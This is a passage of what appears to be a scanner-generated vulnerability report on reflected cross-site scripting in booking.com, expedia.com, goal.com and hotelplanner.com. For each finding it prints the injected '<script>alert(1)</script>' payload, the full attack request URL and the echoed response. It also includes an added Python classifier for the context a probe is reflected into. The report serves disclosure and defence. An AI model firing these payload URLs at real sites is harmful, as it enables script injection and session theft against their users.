Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDPZ3nY%2BK7rx45hTbiDc3NR0kCPIILsWbZor2CD1FfGdefKUJXrZ4LhRultf9wi7%2BBycH4xAtJDnocbX99V9iTV%2BCZu%2F7CR3zJukD8HaD4O%2Bn3PgwRcsOPNeQz%2FfcHJ3A0qMMXY8yG0Ri0I8JCYVxf4gOpKnX1LZ%2B13%2B6Hwn8HQQELuwdIkYYXdFOFc%2Bya2y1SdJYOwX293XsVCddY5O4Ed9skYxPbnMgpYl%2Bf6sLx94GLK%2BcvHKHQHK8NaqzRR8nz7slUofgPj2K7z4XpIqqa6KSjA6pdyak%2FWc%2BrEkI5%2BbX93FEtvkdYHtU5Y2GEazztQa50C7GgGNPEVQy22%2Bw608iybHuCrkISTj2Bf%2BQzq6idsLhjmJOLyEkyNdWC6AgeCrYDCl5cVhW8KnAlopAP5fAHChHUkHRSFpAJXbzag63EKAceWFUi6QZfBEwDxn7SaUi%2BBJE84p3G%2FqcoENQOhPHxugZlfnVlF8V8cfwaNARbYxAkRpWxUXHjiBwkFF6%2BoDWHSn7RgzPzqFcjgDNnqdxls%2Bnw7Uji4npBVggyyNuMTTUSJdSZ1Pfr1z197RMGmJ%2B8NACzXFJGLISS8FBxQjTnYJVOF6OM%2FdoS%2FHkPxBQeqGJqIoBCAMJ%2Fc2lbVczUQ2KDl22Pe7iJlXwGnN1V3y8Lwb8V9kJA%2BmvtTwOtJg8WKt6j85Ez0jttT6xADtkswCJ8b07bA0sRH9%2Fwa%2Bbn7%2FagOZWCBHF4GRHU3%2F47tQKLUsgvX44d2eSMpKnu%2FWygwE6NOhXj4PCA8xBBJEmHTJOhP5hqRHZ4gp7bu%2F4mGyyYHPVfHbr%2F2UNo2Wj%2F1PU0WLGA5IwNoIA1QLIeTSva4Mn99qy4UZjin4x32XmVJNrKhnxrNKdp6tW%2BgdAdbaY2eejT7gd1gzkrErRRRLp1WViOeW9Mtg7anCiXm3Vzn9Lpr9gT37xyElW32DEGfzYw04TGIlpr1CTVXyaWdWiMJ8CZv0IVf37s%2F%2FipxnP9bFIOCdZOiFfs237EMB7%2F4zZkX59HHKQk1bwmX0g4fTjhA2x8jTLFQAe3FjlibjVFjcCHO1bCUMCEtatpHNuABk8SOU9gUFi%2FBcpMWdfjVaCcLGE3hjnnRbw72PFt9lybtMU%2FnB1ZO6toeSrcGegfBvsCIvDMIwBuRKeNZop%2B367u9F3pEaTwUTXCbh%2FKEwPV2gSaLerX527o8y2IAL7%2FK28tsfz7yo9bAanvsZtmFtQPppDJTuzPgyPvKgcAUA5yWdDzLhPfQl6rS9n5gmgviTtbqd5QghT88r0QVbF2CBWbKEetKfmXdEqLL21Tiu2bOsFEp3AbU5Fo1XmUdgIc%2FaTMLtPPtdg5m%2BqNEQxoo35FJtp7aXHp0OB1EJNBu1sSMcW00HsrUjvvMqLSvC0CFv55uMRQDX7onAaOojVkgf55a8lcRIwsKzUo2Llx0JkVxEBNEROyUFYefQ%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:24:16 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 391701
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
g.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/searchresults.en.html?city=20061717;utm_campaign=us;utm_medium=SPPC;utm_source=igougo;utm_term=ufi-P20061717a141a'-alert(1)-'2eed708b64a';
booking.env.b_canonical_url_delimiter = ';';
booking.env.b_query_params_delimiter = ';';


booking.env.see_all_xxxx_rooms = 'XXXX more room types';


booking.env.group_room = 'Room';
booking.
...[SNIP]...

4.235. http://www.booking.com/searchresults.html [utm_term parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the utm_term request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3970"><script>alert(1)</script>ee37038bef was submitted in the utm_term parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717e3970"><script>alert(1)</script>ee37038bef HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:24:02 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YZhUqCoptreOEKGIG3i9Wj9TCGxBOeOcb2HFY1Mz6YQhiBZk%2FG19xX6cwfAkmqUOZRQoo2dmszfOrAZxpx6FIhW1VI805QdDIdiP1JTw0bAc7cMFrqIQrMPx9XDHtuOTPrjXpqYppS1QJewzeQc1ByOxgfwFWxu10RIRL1FL9yIvWJArEWN3sR7uXtN0NLu%2FMW%2BBUafdRhlGXFTbsWCGhbwjFv4%2F52Q0ja8CIXnUcAl7%2F%2Bq9NMs87kHwrPq9ih7PiItz2o9oNR%2BCtvME8%2FJff%2FDXZUGibyLHl8EvTC0n1DApDPLyTBX0QJ1oukWPFsv0XjAfvpS%2FrauO3NamL81Pzqg8bxEiuwyhIihisclrDhG24Bd5JDtKO36LpXoIjOeD21ZohZX8BGH6ZiM2C00fnTq6u2VydAgjOLxjLcp2aI1U%2FjjI4FzRJUNWGfhUI2R2tn8zrCplKh1%2Bn8QEpCIMO3VR4QPgePztyfB0iGKPKEmHIXqpaAGv1ROsSDr91LrGIq8N3YFm%2FuHIFg8Q5xmSATEtti2H%2BFcXpxfFwtIgsP5Zp3YGBOHXFLN6aRPCBi%2Bfq%2FufexPcEZ8PN0qY4TVVnxJFR7ncEHqNg%2Fmj2QhVbaizxz3hMDa48b9XxlB8HgXiBnLy47zqQPY4v%2FYZjhXc3M4Z1csvn4xccNeBX19489xpGllodjoUor%2BBpz0wYAz6H0WCQaLTMBpNeqRVu1yjGbjPrm%2B05MilCtxD1RDFn8Hwekaov8Z5v6RbLFI3AAlmi%2BX9qhuuTl%2Fo0YDKJOhVhmyTa%2F1WDqYk%2BQmZGmlUSeDip1qMxJUwCRtdYQGBANLelForJsB0AYQSn%2FgnANl3uBFVps8HnLA27HuJm3bf6BBdjRDi2S1Tt5bXGoin1bZasEzhJ3uNbVyXsUzEGQQcl%2BsW2rWGm41jgoTGR8a73zcxGsIsJXO224iVCx4RIoy8RqteP3pOxf6RxQV98jrHVQcvUjlDbMpQmTwT4BrIp61AGwxyQMTpXzumrdCOvuELSY0N4jly%2BB6D2S9wB7v0k50gORgWsD%2BP8id%2FvnglKXbu%2Fevdu12ERD4ScuaSaaW4CEkeBNd5coouMS5peSVR6eb%2BWBmyOVG1n6ncCD9pGKjpo9bSJSPfXka5j1pIE9PsuoHcgnyn0sZnzCTZ72pF6AXJTKGiLPhilyu1TJ2a2xUVTiLokfUrg5lSyK4FaTmnMj61yDrByt%2By9z75%2FwO4tUGpDuuTOo7sXXrJRdi4voXdHdNHed38rbSI6e4kDQg2Bjl7erXFG7BHb940bL%2BP6VTUQsfx7PdWJB6jbv8DonxBDO8%2FAGk%2FLeJZvquBg6wT8negxT8d%2B9GtGcNNsIL3V7jhWOn9luLPQrEX4yDhmPfxx5jsX6BTY75V0rB7phkjkcpX3bBjXd97u%2FOidtu1XsOD5DgvbJFQ2ftQgFObmZVrnZwWj0TMKvBOFsw5rvvpPw%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:24:03 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 391756
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
<link rel="canonical" href="http://www.booking.com/searchresults.en.html?city=20061717;utm_campaign=us;utm_medium=SPPC;utm_source=igougo;utm_term=ufi-P20061717e3970"><script>alert(1)</script>ee37038bef" />
...[SNIP]...

4.236. http://www.expedia.com/Hotel-Search [hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_hotelSearchRegionControl_cityControl_inpCity parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /Hotel-Search

Issue detail

The value of the hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_hotelSearchRegionControl_cityControl_inpCity request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56895"><script>alert(1)</script>39b5d7891f9b1da0d was submitted in the hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_hotelSearchRegionControl_cityControl_inpCity parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert it to a GET request, which makes the attack easier to demonstrate and deliver, since the payload can then be carried in a single link.

Request

GET /Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&action=hotelPackageWizard%40searchHotelOnly&packageType=HOTEL_ONLY&hotelPackageWizard_hotelPackageWizardControl_inpPackageType=HOTEL_ONLY&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_hotelSearchRegionControl_hotelRegionTypeControl_inpRegionType=CITY&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_hotelSearchRegionControl_cityControl_inpCity=Boston%2CUnited+States56895"><script>alert(1)</script>39b5d7891f9b1da0d&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_hotelSearchRegionControl_cityControl_inpCityRegionId=&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_dateRangeWidget_inpStartDate=10%2F04%2F2011&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_dateRangeWidget_inpEndDate=10%2F07%2F2011&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_roomInputWidget_hotelRoomCountInput=1&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_roomInputWidget_adultCountInput=1&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_roomInputWidget_childCountInput=0&isAdditionOptionExist=0&postRedirect=1&olacid=US.BD.IGOUGO-US.HOTEL.HOTEL HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/pubspec/scripts/eap.asp?OLACID=US.BD.IGOUGO-US.HOTEL.HOTEL&GOTO=HotSearch&CityName=Boston,United%20States&InDate=10/04/2011&OutDate=10/07/2011&NumAdults=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p1=`tpid=v.1,1`11; MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:12:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: p1=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:12:23 GMT; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:12:23 GMT; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:12:23 GMT; Path=/
Content-Length: 590270

<!DOCTYPE html><DIV ID="interstitialServerPush1" style="display:block">

<!--Table here is required so that we can center the page in all displays-->
<table class="basicInterstialWidget" border="0
...[SNIP]...
<input type="hidden" value="Boston,United States56895"><script>alert(1)</script>39b5d7891f9b1da0d" name="inpCityForHotelGroup" id="inpCityForHotelGroup" />
...[SNIP]...

4.237. http://www.expedia.com/Hotel-Search [hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_hotelSearchRegionControl_cityControl_inpCity parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /Hotel-Search

Issue detail

The value of the hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_hotelSearchRegionControl_cityControl_inpCity request parameter is copied into the HTML document as plain text between tags. The payload 1f820<script>alert(1)</script>fc98f5f61bc4a03a9 was submitted in the hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_hotelSearchRegionControl_cityControl_inpCity parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert it to a GET request, which makes the attack easier to demonstrate and deliver, since the payload can then be carried in a single link.

Request

GET /Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&action=hotelPackageWizard%40searchHotelOnly&packageType=HOTEL_ONLY&hotelPackageWizard_hotelPackageWizardControl_inpPackageType=HOTEL_ONLY&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_hotelSearchRegionControl_hotelRegionTypeControl_inpRegionType=CITY&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_hotelSearchRegionControl_cityControl_inpCity=1f820<script>alert(1)</script>fc98f5f61bc4a03a9&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_hotelSearchRegionControl_cityControl_inpCityRegionId=&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_dateRangeWidget_inpStartDate=10%2F04%2F2011&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_dateRangeWidget_inpEndDate=10%2F07%2F2011&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_roomInputWidget_hotelRoomCountInput=1&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_roomInputWidget_adultCountInput=1&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_roomInputWidget_childCountInput=0&isAdditionOptionExist=0&postRedirect=1&olacid=US.BD.IGOUGO-US.HOTEL.HOTEL HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/pubspec/scripts/eap.asp?OLACID=US.BD.IGOUGO-US.HOTEL.HOTEL&GOTO=HotSearch&CityName=Boston,United%20States&InDate=10/04/2011&OutDate=10/07/2011&NumAdults=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p1=`tpid=v.1,1`11; MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:12:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: p1=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:12:52 GMT; Path=/
Set-Cookie: iEAPID=00000,; Domain=.expedia.com; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:12:52 GMT; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:12:52 GMT; Path=/
Content-Length: 50057

<!DOCTYPE html><DIV ID="interstitialServerPush1" style="display:block">

<!--Table here is required so that we can center the page in all displays-->
<table class="basicInterstialWidget" border="0
...[SNIP]...
<div class="pageHeadingDisambigB">
Please help us with your request for &quot;1f820<script>alert(1)</script>fc98f5f61bc4a03a9&quot;
    </div>
...[SNIP]...

4.238. http://www.goal.com/en/comment/comments-box [allCommentsUrl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.goal.com
Path:   /en/comment/comments-box

Issue detail

The value of the allCommentsUrl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82c81"><script>alert(1)</script>fbfcf081cf0 was submitted in the allCommentsUrl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/comment/comments-box?allCommentsUrl=%2Fen%2Fnews%2F9%2Fengland%2F2011%2F10%2F01%2F2691360%2Fanderson-confident-manchester-united-will-keep-unbeaten-run%2Fcomments82c81"><script>alert(1)</script>fbfcf081cf0&entityId=13994828 HTTP/1.1
Host: www.goal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1479357280-1317599429942; __utma=167609825.336600251.1317599442.1317599442.1317599442.1; __utmb=167609825.1.10.1317599442; __utmc=167609825; __utmz=167609825.1317599442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _em_hl=1; _em_vt=6b3bfb104abb2666e789b9e202024e62e18088e413-981323754e88f8d5; _em_v=cf9911b66e4d49b949eaf13bd6fa4e88f8d57af834-210214684e88f8d5; l=en

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0,must-revalidate,s-maxage=300
Content-Language: en
Content-Type: text/html; charset=UTF-8
Date: Mon, 03 Oct 2011 00:00:33 GMT
Expires: Sun, 02 Oct 2011 00:00:33 +0000
Server: Apache/2.2.3 (Red Hat)
X-Goal-Flavors: ad970x40navbar
Content-Length: 7267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr" lang="en">

...[SNIP]...
<input name="allCommentsUrl" type="hidden" value="/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run/comments82c81"><script>alert(1)</script>fbfcf081cf0" />
...[SNIP]...

4.239. http://www.goal.com/en/teams/england/97/man-utd-news [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.goal.com
Path:   /en/teams/england/97/man-utd-news

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b508'%3bf2775266eeb was submitted in the REST URL parameter 5. This input was echoed as 6b508';f2775266eeb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Note that the echoed text already contains an unescaped single quote and semicolon; in a JavaScript string context a break-out does not depend on angle brackets surviving, so filtering of < and > alone would not close this issue.
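The check the scanner performs for findings like this one, reconstructed as an added example (it is not code from the XSS.CX report or from the scanner that produced it): send a probe wrapped in random-looking markers, locate every place it comes back, classify the surrounding markup, and record which metacharacters survived. The sample bodies are constructed to mirror the snippets in 4.234 through 4.242 and are not the live responses; the marker strings, the context heuristics and the per-context break-out table are assumptions made for the example. The goal.com case above is the one worth studying: the angle brackets are gone but the single quote is not, and in a JavaScript string context a quote is all that is needed, which is why the report tells you to follow up by hand.

```python
"""Classify where a reflected probe lands and which metacharacters survived.
Added example; the sample bodies are constructed to mirror findings
4.234-4.242 in this report, not captured from the live sites."""
import re

PROBE = "'\"<>--"                  # one probe carrying every metacharacter of interest
PREFIX, SUFFIX = "q4c1", "7zk2"    # random-looking markers (assumed values)
METACHARS = ('"', "'", "<", ">", "--")
# Characters that must survive for a break-out in each context (heuristic).
NEEDED = {
    "js_string_single": ("'",), "js_string_double": ('"',), "js_code": (),
    "attr_double": ('"',), "attr_single": ("'",), "tag": (">",),
    "html_text": ("<", ">"), "html_comment": ("--", ">"),
}


def find_reflections(body, prefix=PREFIX, suffix=SUFFIX):
    """Return (offset, echoed_text) for every prefix...suffix pair in body."""
    pattern = re.escape(prefix) + r"(.*?)" + re.escape(suffix)
    return [(m.start(1), m.group(1)) for m in re.finditer(pattern, body, re.S)]


def classify_context(body, pos):
    """Guess the output context at offset pos from the markup before it."""
    before = body[:pos]
    lower = before.lower()
    open_comment = before.rfind("<!--")
    if open_comment != -1 and before.rfind("-->") < open_comment:
        return "html_comment"
    open_script = lower.rfind("<script")
    if open_script != -1 and lower.rfind("</script") < open_script:
        code = before[open_script:]
        code = code[code.find(">") + 1:]           # skip the <script ...> tag itself
        if code.count("'") % 2:
            return "js_string_single"
        if code.count('"') % 2:
            return "js_string_double"
        return "js_code"
    lt, gt = before.rfind("<"), before.rfind(">")
    if lt > gt:                                    # inside an unclosed tag
        tag = before[lt:]
        if tag.count('"') % 2:
            return "attr_double"
        if tag.count("'") % 2:
            return "attr_single"
        return "tag"
    return "html_text"


def reflection_report(body, payload=PROBE, prefix=PREFIX, suffix=SUFFIX):
    """One record per reflection point: context, what survived, break-out verdict."""
    report = []
    for pos, echoed in find_reflections(body, prefix, suffix):
        ctx = classify_context(body, pos)
        report.append({
            "context": ctx,
            "echoed": echoed,
            "unmodified": echoed == payload,
            "survived": [c for c in METACHARS if c in payload and c in echoed],
            "neutralised": [c for c in METACHARS if c in payload and c not in echoed],
            "breakout": all(c in echoed for c in NEEDED[ctx]),
        })
    return report


# Constructed responses, each echoing PREFIX + PROBE + SUFFIX the way the
# corresponding finding describes.
SAMPLES = {
    # 4.234/4.235: <link rel="canonical"> attribute and a JS string, unmodified
    "booking_like": (
        '<html><head>\n<link rel="canonical" href="http://www.booking.com/'
        'searchresults.en.html?utm_term=ufi-P20061717q4c1\'"<>--7zk2" />\n'
        "<script>\nbooking.env.b_canonical_url = 'http://www.booking.com/"
        "searchresults.en.html?utm_term=ufi-P20061717q4c1'\"<>--7zk2';\n"
        "</script></head></html>"
    ),
    # 4.237: text node; quotes entity-encoded, angle brackets left alone
    "expedia_like": (
        '<div class="pageHeadingDisambigB">\nPlease help us with your request '
        "for &quot;q4c1&#39;&quot;<>--7zk2&quot;\n</div>"
    ),
    # 4.239: JS string where only the quote survives; still a break-out
    "goal_like": (
        '<script type="text/javascript">\n'
        "var teamname = 'man-utd-newsq4c1'\"--7zk2';\n</script>"
    ),
    # 4.240/4.242: inside an HTML comment on an error page
    "hotelplanner_like": (
        "<html><body>\n<!--\n\nDiagnostic Information:\nThe value 1q4c1'\"<>--7zk2"
        " cannot be converted to a number. <br>\n-->\n</body></html>"
    ),
}


def scan_samples(samples=SAMPLES):
    """Run reflection_report over every sample; returns {name: report}."""
    return {name: reflection_report(body) for name, body in samples.items()}
```

Calling scan_samples() gives one record per reflection point. The expedia-style body shows the pattern the scanner calls "echoed as": quotes came back as entities but < and > did not, so the text-node break-out still stands; the goal-style body shows the reverse, angle brackets stripped but the quote intact, which is enough in a JavaScript string. The context heuristics are deliberately simple (quote parity after the last open tag or script block) and will misjudge markup with quotes inside JavaScript comments; a real scanner confirms by parsing the response rather than counting characters.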

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en/teams/england/97/man-utd-news6b508'%3bf2775266eeb HTTP/1.1
Host: www.goal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0,must-revalidate,s-maxage=600
Content-Language: en
Content-Type: text/html; charset=UTF-8
Date: Sun, 02 Oct 2011 23:54:56 GMT
Expires: Sat, 01 Oct 2011 23:54:56 +0000
Server: Apache/2.2.3 (Red Hat)
X-Goal-Flavors: ad970x40navbar,turkishair,epleague
Content-Length: 156117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr" lang="en">

...[SNIP]...
vascript" src="http://ad.doubleclick.net/adj/');document.write('gna.en/level2;tile=' + dblClickIndex + ';sz=728x90;ord=' + ord + '?area=2l&pos=1&team=manu&league=epl&pagetype=team&teamname=man-utd-news6b508';f2775266eeb&ord=' + ord + '">
...[SNIP]...

4.240. http://www.hotelplanner.com/ClickThrough.cfm [Source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /ClickThrough.cfm

Issue detail

The value of the Source request parameter is copied into an HTML comment. The payload ec609--><script>alert(1)</script>6680255e979 was submitted in the Source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /ClickThrough.cfm?Source=IGoUGoec609--><script>alert(1)</script>6680255e979 HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; LANGUAGE=1; SOURCECODE=IGoUGo

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:10:31 GMT
